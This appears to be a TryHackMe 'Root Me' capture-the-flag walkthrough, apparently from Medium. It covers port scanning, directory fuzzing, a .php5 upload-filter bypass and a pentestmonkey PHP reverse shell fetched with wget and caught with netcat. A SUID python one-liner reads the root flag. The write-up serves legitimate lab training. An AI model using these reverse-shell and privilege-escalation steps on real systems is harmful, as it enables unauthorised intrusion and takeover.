Root Me | TryHackMe Writeup

Let’s hack

Task1 : Deploy the machine

Connect to tryhackme vpn

connect to tryhackme vpn

1- click to OpenVPN

2- download VPN file

3- run the file (sudo openvpn file.ovpn)

connected successfully

Task2 : Reconnaissance

Nmap Scan:

nmap -sV <Machine IP>

  • -sV : Version detection

There are 2 ports open :
22/ssh — OpenSSH 7.6p1
80/http — Apache httpd 2.4.29

#1.1- Scan the machine , how many ports are open ?

2

#1.2- What version of Apache is running?

2.4.29

#1.3- What service is running on port 22?

SSH

next step : fuzzing directories using Gobuster tool

gobuster dir -w <Path_To_Wordlist> -u http://<Machine_IP>

  • w : wordlist
  • -u : url

#1.4- Find directories on the web server using the GoBuster tool.

No answer needed

#1.5- What is the hidden directory?

/panel/

Task3 : Getting a shell

navigate to url http://<Machine_IP>

it’s not an important page

check the panel directory

includes file upload vulnerability , try to upload file with php extension

php extension not permitted

try to upload file with php5 extension

php5 is permitted

so , search for php reverse shell pentester monkey on github

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

open the file and change the ip to your attacker ip and the listener port on your machine

try to upload the file and check the uploads directory

click to shell.php5 and listen with your port ( nc -nv 4444 )

we got a shell

i need the user flag , so i can search on terminal about user.txt by following command

find / -type f -name user.txt

/ : root directory

  • type f : file
  • -name : file name

user.txt exists on /var/www

Task5 : Privilege escalation

Search for files with SUID permission, which file is weird?

/usr/bin/python

With the find command we can look at the binary file who have SUID, and /usr/bin/python is an interesting file.

2.Find a form to escalate your privileges.

Just click Completed

Because I just need to read root.txt, so I use File read command from gtfobins.

So, to read root.txt file write this command

python -c ‘print(open(“/root/root.txt”).read())’

Machine hacked done ..

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store